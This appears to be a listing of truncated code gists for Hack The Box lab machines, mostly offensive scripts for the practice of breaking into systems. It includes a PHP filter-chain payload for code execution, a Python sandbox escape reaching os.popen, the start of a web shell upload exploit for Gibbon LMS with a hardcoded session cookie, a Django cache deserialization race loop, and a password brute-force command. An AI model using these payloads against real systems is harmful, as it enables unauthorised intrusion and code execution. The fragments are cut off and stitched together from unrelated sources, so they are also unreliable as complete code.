| import requests | |
| from bs4 import BeautifulSoup | |
| from pwn import log | |
| import sys, string | |
| def exec(data): | |
| payload = "http://portal.guardian.htb/admin/reports.php?report=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP |
exploit.py is a script to test what payload that exactly triggers while there's no error handling discloses.ssti.txt is a simple SSTI wordlist in the wild.exploit2.py for deserialization attack on Django.while true; do cp -r *djcache /var/tmp/django_cache/; find /var/tmp/django_cache/ -type f -user sandy | while IFS= read -r line; do rm -rf $line; done; done
go run main.go -wordfile /opt/seclists/Passwords/Leaked-Databases/rockyou.txt -timeout 30s -workers 100 -cmd /home/user/.local/bin/pyAesCrypt -- -d web_20250806_120723.zip.aes -p {candidate}
| SIGNED\Access Control Assistance Operators | |
| SIGNED\Account Operators | |
| SIGNED\Administrators | |
| SIGNED\Allowed RODC Password Replication Group | |
| SIGNED\Authenticated Users | |
| SIGNED\Backup Operators | |
| SIGNED\BitLocker Recovery | |
| SIGNED\BranchCache Administrators | |
| SIGNED\BranchCache Hosts | |
| SIGNED\Certificate Service DCOM Access |
| import importlib | |
| from functools import reduce | |
| BITSHIFTED = ["B", "I", "T", "S", "H", "I", "F", "T", "E", "D"] | |
| globals()["x"] = lambda k: eval(k) | |
| globals()["y"] = lambda k: exec(k) | |
| rrrrrrhrrrrrrrrrr = 0x42 | |
| rrrrrrrhrrrrrrrrr = 0x43 | |
| rrrrrrrrhrrrrrrrr = 0x44 |
| POST /api/auth HTTP/1.1 | |
| Host: cypher.htb | |
| Content-Length: 303 | |
| X-Requested-With: XMLHttpRequest | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 | |
| Accept: */* | |
| DNT: 1 | |
| Content-Type: application/json | |
| Origin: http://cypher.htb | |
| Referer: http://cypher.htb/login |
| g = run_code.__globals__ | |
| m = g["s"+"ys"].modules | |
| o = m["o"+"s"] | |
| p = getattr(o, "p"+"o"+"pen") | |
| c = p("id") | |
| for x in c: print(x) |
| import requests | |
| import sys | |
| import base64 | |
| TARGET = "http://frizzdc.frizz.htb" | |
| UPLOAD_PATH = "/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" | |
| SHELL_PATH = "/Gibbon-LMS/modules/Rubrics/rscreenshot_123456890.php" | |
| COOKIE = {'G60fa1cd0af7be78b': '1vka2pu1otv1l3nnj5m0uugdsv'} | |
| def generate_payload(cmd_param='1'): |
| import requests | |
| import urllib.parse | |
| import readline | |
| from bs4 import BeautifulSoup | |
| import re | |
| from termcolor import colored | |
| url = "http://nocturnal.htb/admin.php?view=admin.php" | |
| headers = { |